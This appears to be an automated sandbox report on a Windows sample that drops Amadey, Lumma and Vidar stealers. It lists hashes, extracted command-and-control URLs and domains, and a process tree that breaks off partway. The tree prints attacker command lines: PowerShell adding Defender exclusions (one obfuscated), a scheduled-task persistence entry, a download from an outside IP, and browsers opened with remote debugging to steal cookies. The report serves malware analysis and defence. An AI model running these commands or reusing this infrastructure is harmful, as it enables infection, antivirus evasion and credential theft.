Resubmissions

07/03/2025, 19:35

250307-yaszdswky8 10

07/03/2025, 17:54

250307-wg8bjstzcz 10

Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 19:35

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    34a1010b4f6cf9c985d71453702602d7

  • SHA1

    266541f9f120e4d4b79ebb5687bbe8a045281b6b

  • SHA256

    ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09

  • SHA512

    fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d

  • SSDEEP

    49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://j8arisechairedd.shop/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://gmodelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://garisechairedd.shop/api

https://0modelshiverd.icu/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 17 IoCs
  • Uses browser remote debugging 2 TTPs 14 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 15 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4996
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1140
      • C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe
        "C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1412
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:668
        • C:\Program Files\runtime\COM Surrogate.exe
          "C:\Program Files\runtime\COM Surrogate.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:5036
      • C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe
        "C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2512
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:372
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd" sgcCUaUFtA
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3088
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1744
              • C:\Windows\SysWOW64\findstr.exe
                "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                7⤵
                • System Location Discovery: System Language Discovery
                PID:224
      • C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe
        "C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4308
      • C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe
        "C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3700
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10125901121\GjThRAJ.cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4652
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri http://2.59.41.142:8080/files.zip -OutFile C:\Users\Admin\AppData\Roaming\Suh\files.zip"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4956
      • C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe
        "C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe
          "C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:112
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 800
          4⤵
          • Program crash
          PID:3180
      • C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe
        "C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1412
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2932
        • C:\Users\Admin\AppData\Roaming\a.exe
          "C:\Users\Admin\AppData\Roaming\a.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:5168
          • C:\Users\Admin\AppData\Local\Temp\Qtumbtahg.exe
            "C:\Users\Admin\AppData\Local\Temp\Qtumbtahg.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6860
      • C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe
        "C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1792
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:5108
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed757cc40,0x7ffed757cc4c,0x7ffed757cc58
            5⤵
              PID:536
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:2
              5⤵
                PID:2936
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:3
                5⤵
                  PID:4828
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1592,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2584 /prefetch:8
                  5⤵
                    PID:3600
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:3992
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3364 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4276
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4408
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3168,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                    5⤵
                      PID:3004
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:8
                      5⤵
                        PID:4048
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4992,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4616 /prefetch:8
                        5⤵
                          PID:4308
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8
                          5⤵
                            PID:2388
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5216 /prefetch:8
                            5⤵
                              PID:4284
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5348,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4920 /prefetch:8
                              5⤵
                                PID:5104
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5352,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5492 /prefetch:8
                                5⤵
                                  PID:2112
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5632,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5484 /prefetch:8
                                  5⤵
                                    PID:4128
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5608,i,12003738043276815552,7474795880396668577,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5508 /prefetch:2
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:5708
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  4⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:7392
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed72b46f8,0x7ffed72b4708,0x7ffed72b4718
                                    5⤵
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:7404
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                    5⤵
                                      PID:7644
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:7656
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2484 /prefetch:8
                                      5⤵
                                        PID:7664
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:7864
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:7876
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:5420
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:1412
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
                                        5⤵
                                          PID:6140
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                                          5⤵
                                            PID:5780
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
